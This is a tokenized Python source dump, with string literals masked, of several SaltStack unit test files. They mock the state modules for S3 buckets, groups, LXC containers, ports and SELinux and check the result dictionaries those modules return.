'<STR_LIT>' ) } ) : <EOL> result = salt_states [ '<STR_LIT>' ] ( <EOL> '<STR_LIT>' , <EOL> Bucket = '<STR_LIT>' , <EOL> ** config_in <EOL> ) <EOL> self . assertTrue ( result [ '<STR_LIT:result>' ] ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] , { } ) <EOL> def test_present_when_bucket_exists_all_mods ( self ) : <EOL> self . conn . list_buckets . return_value = deepcopy ( list_ret ) <EOL> for key , value in config_ret . iteritems ( ) : <EOL> getattr ( self . conn , key ) . return_value = deepcopy ( value ) <EOL> with patch . dict ( funcs , { '<STR_LIT>' : MagicMock ( return_value = '<STR_LIT>' ) } ) : <EOL> result = salt_states [ '<STR_LIT>' ] ( <EOL> '<STR_LIT>' , <EOL> Bucket = '<STR_LIT>' , <EOL> LocationConstraint = config_in [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertTrue ( result [ '<STR_LIT:result>' ] ) <EOL> self . assertNotEqual ( result [ '<STR_LIT>' ] , { } ) <EOL> def test_present_with_failure ( self ) : <EOL> self . conn . head_bucket . side_effect = [ not_found_error , None ] <EOL> self . conn . list_buckets . return_value = deepcopy ( list_ret ) <EOL> self . conn . create_bucket . side_effect = ClientError ( error_content , '<STR_LIT>' ) <EOL> with patch . dict ( funcs , { '<STR_LIT>' : MagicMock ( return_value = '<STR_LIT>' ) } ) : <EOL> result = salt_states [ '<STR_LIT>' ] ( <EOL> '<STR_LIT>' , <EOL> Bucket = '<STR_LIT>' , <EOL> ** config_in <EOL> ) <EOL> self . assertFalse ( result [ '<STR_LIT:result>' ] ) <EOL> self . assertTrue ( '<STR_LIT>' in result [ '<STR_LIT>' ] ) <EOL> def test_absent_when_bucket_does_not_exist ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . conn . head_bucket . side_effect = [ not_found_error , None ] <EOL> result = salt_states [ '<STR_LIT>' ] ( '<STR_LIT:test>' , '<STR_LIT>' ) <EOL> self . assertTrue ( result [ '<STR_LIT:result>' ] ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] , { } ) <EOL> def test_absent_when_bucket_exists ( self ) : <EOL> result = salt_states [ '<STR_LIT>' ] ( '<STR_LIT:test>' , '<STR_LIT>' ) <EOL> self . assertTrue ( result [ '<STR_LIT:result>' ] ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] , None ) <EOL> def test_absent_with_failure ( self ) : <EOL> self . conn . delete_bucket . side_effect = ClientError ( error_content , '<STR_LIT>' ) <EOL> result = salt_states [ '<STR_LIT>' ] ( '<STR_LIT:test>' , '<STR_LIT>' ) <EOL> self . assertFalse ( result [ '<STR_LIT:result>' ] ) <EOL> self . assertTrue ( '<STR_LIT>' in result [ '<STR_LIT>' ] ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> from salttesting import TestCase , skipIf <EOL> from salttesting . helpers import ensure_in_syspath <EOL> from salttesting . mock import ( <EOL> MagicMock , <EOL> patch , <EOL> NO_MOCK , <EOL> NO_MOCK_REASON <EOL> ) <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> from salt . states import group <EOL> group . __salt__ = { } <EOL> group . __opts__ = { } <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class GroupTestCase ( TestCase ) : <EOL> '''<STR_LIT>''' <EOL> def test_present ( self ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : { } <EOL> } <EOL> ret . update ( { '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:result>' : None } ) <EOL> self . assertDictEqual ( group . present ( "<STR_LIT>" , delusers = True , <EOL> members = True ) , ret ) <EOL> ret . update ( { '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' } ) <EOL> self . assertDictEqual ( group . present ( "<STR_LIT>" , addusers = [ '<STR_LIT:a>' ] , <EOL> delusers = [ '<STR_LIT:a>' ] ) , ret ) <EOL> ret . update ( { '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' } ) <EOL> mock = MagicMock ( side_effect = [ { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , False , False , False ] ) <EOL> with patch . object ( group , '<STR_LIT>' , mock ) : <EOL> with patch . dict ( group . __opts__ , { "<STR_LIT:test>" : True } ) : <EOL> self . assertDictEqual ( group . present ( "<STR_LIT>" ) , ret ) <EOL> ret . update ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertDictEqual ( group . present ( "<STR_LIT>" ) , ret ) <EOL> with patch . dict ( group . __opts__ , { "<STR_LIT:test>" : False } ) : <EOL> mock = MagicMock ( return_value = [ { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:name>' : '<STR_LIT>' } ] ) <EOL> with patch . dict ( group . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> ret . update ( { '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' } ) <EOL> self . assertDictEqual ( group . present ( "<STR_LIT>" , <NUM_LIT:1> ) , ret ) <EOL> mock = MagicMock ( return_value = False ) <EOL> with patch . dict ( group . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> ret . update ( { '<STR_LIT>' : <EOL> '<STR_LIT>' } ) <EOL> self . assertDictEqual ( group . present ( "<STR_LIT>" ) , ret ) <EOL> def test_absent ( self ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : { } <EOL> } <EOL> mock = MagicMock ( side_effect = [ True , True , True , False ] ) <EOL> with patch . dict ( group . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> with patch . dict ( group . __opts__ , { "<STR_LIT:test>" : True } ) : <EOL> ret . update ( { '<STR_LIT:result>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertDictEqual ( group . absent ( "<STR_LIT>" ) , ret ) <EOL> with patch . dict ( group . __opts__ , { "<STR_LIT:test>" : False } ) : <EOL> mock = MagicMock ( side_effect = [ True , False ] ) <EOL> with patch . dict ( group . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> ret . update ( { '<STR_LIT:result>' : True , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertDictEqual ( group . absent ( '<STR_LIT>' ) , ret ) <EOL> ret . update ( { '<STR_LIT>' : { } , '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertDictEqual ( group . absent ( '<STR_LIT>' ) , ret ) <EOL> ret . update ( { '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertDictEqual ( group . absent ( '<STR_LIT>' ) , ret ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( GroupTestCase , needs_daemon = False ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> from salttesting import skipIf , TestCase <EOL> from salttesting . mock import ( <EOL> NO_MOCK , <EOL> NO_MOCK_REASON , <EOL> MagicMock , <EOL> patch ) <EOL> from salttesting . helpers import ensure_in_syspath <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> from salt . states import lxc <EOL> import salt . utils <EOL> lxc . __salt__ = { } <EOL> lxc . __opts__ = { } <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class LxcTestCase ( TestCase ) : <EOL> '''<STR_LIT>''' <EOL> def test_present ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } } <EOL> mock = MagicMock ( side_effect = [ False , True , True , True , True , True , <EOL> True ] ) <EOL> mock_t = MagicMock ( side_effect = [ None , True , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> with patch . dict ( lxc . __salt__ , { '<STR_LIT>' : mock , <EOL> '<STR_LIT>' : mock_t } ) : <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt } ) <EOL> self . assertDictEqual ( lxc . present ( name , clone_from = True ) , ret ) <EOL> with patch . dict ( lxc . __opts__ , { '<STR_LIT:test>' : True } ) : <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : None } ) <EOL> self . assertDictEqual ( lxc . present ( name , clone_from = True ) , ret ) <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( lxc . present ( name , clone_from = True ) , ret ) <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : None } ) <EOL> self . assertDictEqual ( lxc . present ( name , running = True , <EOL> clone_from = True ) , ret ) <EOL> comt = ( '<STR_LIT>' . format ( name ) ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : None } ) <EOL> self . assertDictEqual ( lxc . present ( name , running = False , <EOL> clone_from = True ) , ret ) <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( lxc . present ( name , running = False , <EOL> clone_from = True ) , ret ) <EOL> with patch . dict ( lxc . __opts__ , { '<STR_LIT:test>' : False } ) : <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( lxc . present ( name , clone_from = True ) , ret ) <EOL> def test_absent ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } } <EOL> mock = MagicMock ( side_effect = [ False , True , True ] ) <EOL> mock_des = MagicMock ( return_value = { '<STR_LIT:state>' : True } ) <EOL> with patch . dict ( lxc . __salt__ , { '<STR_LIT>' : mock , <EOL> '<STR_LIT>' : mock_des } ) : <EOL> comt = ( '<STR_LIT>' . format ( name ) ) <EOL> ret . update ( { '<STR_LIT>' : comt } ) <EOL> self . assertDictEqual ( lxc . absent ( name ) , ret ) <EOL> with patch . dict ( lxc . __opts__ , { '<STR_LIT:test>' : True } ) : <EOL> comt = ( '<STR_LIT>' . format ( name ) ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : None } ) <EOL> self . assertDictEqual ( lxc . absent ( name ) , ret ) <EOL> with patch . dict ( lxc . __opts__ , { '<STR_LIT:test>' : False } ) : <EOL> comt = ( '<STR_LIT>' . format ( name ) ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : { '<STR_LIT:state>' : True } } ) <EOL> self . assertDictEqual ( lxc . absent ( name ) , ret ) <EOL> def test_running ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } } <EOL> mock = MagicMock ( return_value = { '<STR_LIT:state>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> mock_t = MagicMock ( side_effect = [ None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:start>' ] ) <EOL> with patch . dict ( lxc . __salt__ , { '<STR_LIT>' : mock , <EOL> '<STR_LIT>' : mock_t , <EOL> '<STR_LIT>' : mock } ) : <EOL> comt = ( '<STR_LIT>' . format ( name ) ) <EOL> ret . update ( { '<STR_LIT>' : comt } ) <EOL> self . assertDictEqual ( lxc . running ( name ) , ret ) <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( lxc . running ( name ) , ret ) <EOL> with patch . dict ( lxc . __opts__ , { '<STR_LIT:test>' : True } ) : <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : None } ) <EOL> self . assertDictEqual ( lxc . running ( name ) , ret ) <EOL> with patch . dict ( lxc . __opts__ , { '<STR_LIT:test>' : False } ) : <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : False , '<STR_LIT>' : <EOL> { '<STR_LIT:state>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:start>' } } } ) <EOL> self . assertDictEqual ( lxc . running ( name ) , ret ) <EOL> def test_frozen ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } } <EOL> mock = MagicMock ( return_value = { '<STR_LIT:state>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> mock_t = MagicMock ( side_effect = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> with patch . dict ( lxc . __salt__ , { '<STR_LIT>' : mock , <EOL> '<STR_LIT>' : mock_t } ) : <EOL> comt = ( '<STR_LIT>' . format ( name ) ) <EOL> ret . update ( { '<STR_LIT>' : comt } ) <EOL> self . assertDictEqual ( lxc . frozen ( name ) , ret ) <EOL> with patch . dict ( lxc . __opts__ , { '<STR_LIT:test>' : True } ) : <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : None } ) <EOL> self . assertDictEqual ( lxc . frozen ( name ) , ret ) <EOL> with patch . dict ( lxc . __opts__ , { '<STR_LIT:test>' : False } ) : <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : False , '<STR_LIT>' : <EOL> { '<STR_LIT:state>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } } } ) <EOL> self . assertDictEqual ( lxc . frozen ( name ) , ret ) <EOL> def test_stopped ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } } <EOL> mock = MagicMock ( return_value = { '<STR_LIT:state>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> mock_t = MagicMock ( side_effect = [ None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> with patch . dict ( lxc . __salt__ , { '<STR_LIT>' : mock , <EOL> '<STR_LIT>' : mock_t } ) : <EOL> comt = ( '<STR_LIT>' . format ( name ) ) <EOL> ret . update ( { '<STR_LIT>' : comt } ) <EOL> self . assertDictEqual ( lxc . stopped ( name ) , ret ) <EOL> comt = ( '<STR_LIT>' . format ( name ) ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( lxc . stopped ( name ) , ret ) <EOL> with patch . dict ( lxc . __opts__ , { '<STR_LIT:test>' : True } ) : <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : None } ) <EOL> self . assertDictEqual ( lxc . stopped ( name ) , ret ) <EOL> with patch . dict ( lxc . __opts__ , { '<STR_LIT:test>' : False } ) : <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : False , '<STR_LIT>' : <EOL> { '<STR_LIT:state>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } } } ) <EOL> self . assertDictEqual ( lxc . stopped ( name ) , ret ) <EOL> def test_created ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } } <EOL> mock = MagicMock ( return_value = False ) <EOL> with patch . dict ( lxc . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> with patch . object ( salt . utils , '<STR_LIT>' , MagicMock ( ) ) : <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt } ) <EOL> self . assertDictEqual ( lxc . created ( name , clone_from = True ) , ret ) <EOL> def test_started ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } } <EOL> mock = MagicMock ( return_value = None ) <EOL> with patch . dict ( lxc . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> with patch . object ( salt . utils , '<STR_LIT>' , MagicMock ( ) ) : <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt } ) <EOL> self . assertDictEqual ( lxc . started ( name ) , ret ) <EOL> def test_cloned ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } } <EOL> mock = MagicMock ( return_value = False ) <EOL> with patch . dict ( lxc . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> with patch . object ( salt . utils , '<STR_LIT>' , MagicMock ( ) ) : <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt } ) <EOL> self . assertDictEqual ( lxc . cloned ( name , True ) , ret ) <EOL> def test_set_pass ( self ) : <EOL> '''<STR_LIT>''' <EOL> comment = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ret = { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : comment , <EOL> '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : { } } <EOL> self . assertDictEqual ( lxc . set_pass ( '<STR_LIT>' ) , ret ) <EOL> def test_edited_conf ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> comment = ( '<STR_LIT>' . format ( name ) ) <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : comment , <EOL> '<STR_LIT>' : { } } <EOL> with patch . object ( salt . utils , '<STR_LIT>' , MagicMock ( ) ) : <EOL> with patch . dict ( lxc . __opts__ , { '<STR_LIT:test>' : True } ) : <EOL> self . assertDictEqual ( lxc . edited_conf ( name ) , ret ) <EOL> with patch . dict ( lxc . __opts__ , { '<STR_LIT:test>' : False } ) : <EOL> mock = MagicMock ( return_value = { } ) <EOL> with patch . dict ( lxc . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertDictEqual ( lxc . edited_conf ( name ) , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( LxcTestCase , needs_daemon = False ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> from salttesting import skipIf , TestCase <EOL> from salttesting . mock import ( <EOL> NO_MOCK , <EOL> NO_MOCK_REASON , <EOL> MagicMock , <EOL> patch ) <EOL> from salttesting . helpers import ensure_in_syspath <EOL> from salt . exceptions import SaltInvocationError <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> from salt . states import ports <EOL> import os <EOL> ports . __salt__ = { } <EOL> ports . __opts__ = { } <EOL> class MockModule ( object ) : <EOL> """<STR_LIT>""" <EOL> __module__ = '<STR_LIT:A>' <EOL> class MockContext ( object ) : <EOL> """<STR_LIT>""" <EOL> __context__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> class MockSys ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . modules = { '<STR_LIT:A>' : MockContext ( ) } <EOL> ports . sys = MockSys ( ) <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class PortsTestCase ( TestCase ) : <EOL> '''<STR_LIT>''' <EOL> def test_installed ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> options = [ { '<STR_LIT>' : '<STR_LIT>' } ] <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } } <EOL> mock = MagicMock ( side_effect = SaltInvocationError ) <EOL> with patch . dict ( ports . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> comt = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( name ) ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : False } ) <EOL> self . assertDictEqual ( ports . installed ( name ) , ret ) <EOL> mock = MagicMock ( return_value = { } ) <EOL> mock_lst = MagicMock ( return_value = { '<STR_LIT>' : { '<STR_LIT>' : name } } ) <EOL> with patch . dict ( ports . __salt__ , { '<STR_LIT>' : mock , <EOL> '<STR_LIT>' : mock_lst } ) : <EOL> comt = ( '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( ports . installed ( name ) , ret ) <EOL> comt = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : False } ) <EOL> self . assertDictEqual ( ports . installed ( name , options ) , ret ) <EOL> mock_dict = MagicMock ( return_value = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> with patch . dict ( ports . __salt__ , { '<STR_LIT>' : mock_dict } ) : <EOL> with patch . dict ( ports . __opts__ , { '<STR_LIT:test>' : True } ) : <EOL> comt = ( '<STR_LIT>' . format ( name ) ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : None } ) <EOL> self . assertDictEqual ( ports . installed ( name ) , ret ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> mock_dict = MagicMock ( return_value = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> mock_f = MagicMock ( return_value = False ) <EOL> mock_t = MagicMock ( return_value = True ) <EOL> with patch . dict ( ports . __salt__ , { '<STR_LIT>' : mock , <EOL> '<STR_LIT>' : mock_dict , <EOL> '<STR_LIT>' : mock_f , <EOL> '<STR_LIT>' : mock_t } ) : <EOL> with patch . dict ( ports . __opts__ , { '<STR_LIT:test>' : True } ) : <EOL> comt = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : False } ) <EOL> self . assertDictEqual ( ports . installed ( name , options ) , ret ) <EOL> comt = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : None } ) <EOL> self . assertDictEqual ( ports . installed ( name ) , ret ) <EOL> with patch . dict ( ports . __opts__ , { '<STR_LIT:test>' : False } ) : <EOL> comt = ( '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : False } ) <EOL> self . assertDictEqual ( ports . installed ( name , [ { '<STR_LIT>' : '<STR_LIT>' } ] ) , <EOL> ret ) <EOL> with patch . object ( os . path , '<STR_LIT>' , mock_t ) : <EOL> with patch . object ( os . path , '<STR_LIT>' , mock_t ) : <EOL> comt = ( '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : False } ) <EOL> self . assertDictEqual ( ports . installed ( name ) , ret ) <EOL> with patch . dict ( ports . __salt__ , { '<STR_LIT>' : mock_t , <EOL> '<STR_LIT>' : mock_t , <EOL> '<STR_LIT>' : MockModule ( ) } ) : <EOL> comt = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : True } ) <EOL> self . assertDictEqual ( ports . installed ( name , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' } ] ) , <EOL> ret ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( PortsTestCase , needs_daemon = False ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> from salttesting import skipIf , TestCase <EOL> from salttesting . mock import ( <EOL> NO_MOCK , <EOL> NO_MOCK_REASON , <EOL> MagicMock , <EOL> patch <EOL> ) <EOL> from salttesting . helpers import ensure_in_syspath <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> from salt . states import selinux <EOL> selinux . __opts__ = { } <EOL> selinux . __salt__ = { } <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class SelinuxTestCase ( TestCase ) : <EOL> '''<STR_LIT>''' <EOL> def test_mode ( self ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> comt = ( '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : comt } ) <EOL> self . assertDictEqual ( selinux . mode ( '<STR_LIT>' ) , ret ) <EOL> mock_en = MagicMock ( return_value = '<STR_LIT>' ) <EOL> mock_pr = MagicMock ( side_effect = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> with patch . dict ( selinux . __salt__ , <EOL> { '<STR_LIT>' : mock_en , <EOL> '<STR_LIT>' : mock_pr } ) : <EOL> comt = ( '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : comt , '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( selinux . mode ( '<STR_LIT>' ) , ret ) <EOL> with patch . dict ( selinux . __opts__ , { '<STR_LIT:test>' : True } ) : <EOL> comt = ( '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : comt , <EOL> '<STR_LIT:result>' : None } ) <EOL> self . assertDictEqual ( selinux . mode ( '<STR_LIT>' ) , ret ) <EOL> with patch . dict ( selinux . __opts__ , { '<STR_LIT:test>' : False } ) : <EOL> comt = ( '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : comt , <EOL> '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( selinux . mode ( '<STR_LIT>' ) , ret ) <EOL> comt = ( '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : comt , <EOL> '<STR_LIT:result>' : False } ) <EOL> self . assertDictEqual ( selinux . mode ( '<STR_LIT>' ) , ret ) <EOL> def test_boolean ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> value = True <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> mock_en = MagicMock ( return_value = [ ] ) <EOL> with patch . dict ( selinux . __salt__ , <EOL> { '<STR_LIT>' : mock_en } ) : <EOL> comt = ( '<STR_LIT>' . format ( name ) ) <EOL> ret . update ( { '<STR_LIT>' : comt } ) <EOL> self . assertDictEqual ( selinux . boolean ( name , value ) , ret ) <EOL> mock_bools = MagicMock ( return_value = { name : { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> with patch . dict ( selinux . __salt__ , <EOL> { '<STR_LIT>' : mock_bools } ) : <EOL> comt = ( '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT>' : comt } ) <EOL> self . assertDictEqual ( selinux . boolean ( name , None ) , ret ) <EOL> comt = ( '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( selinux . boolean ( name , value , True ) , ret ) <EOL> comt = ( '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( selinux . boolean ( name , value ) , ret ) <EOL> mock_bools = MagicMock ( return_value = { name : { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> mock = MagicMock ( side_effect = [ True , False ] ) <EOL> with patch . dict ( selinux . __salt__ , <EOL> { '<STR_LIT>' : mock_bools , <EOL> '<STR_LIT>' : mock } ) : <EOL> with patch . dict ( selinux . __opts__ , 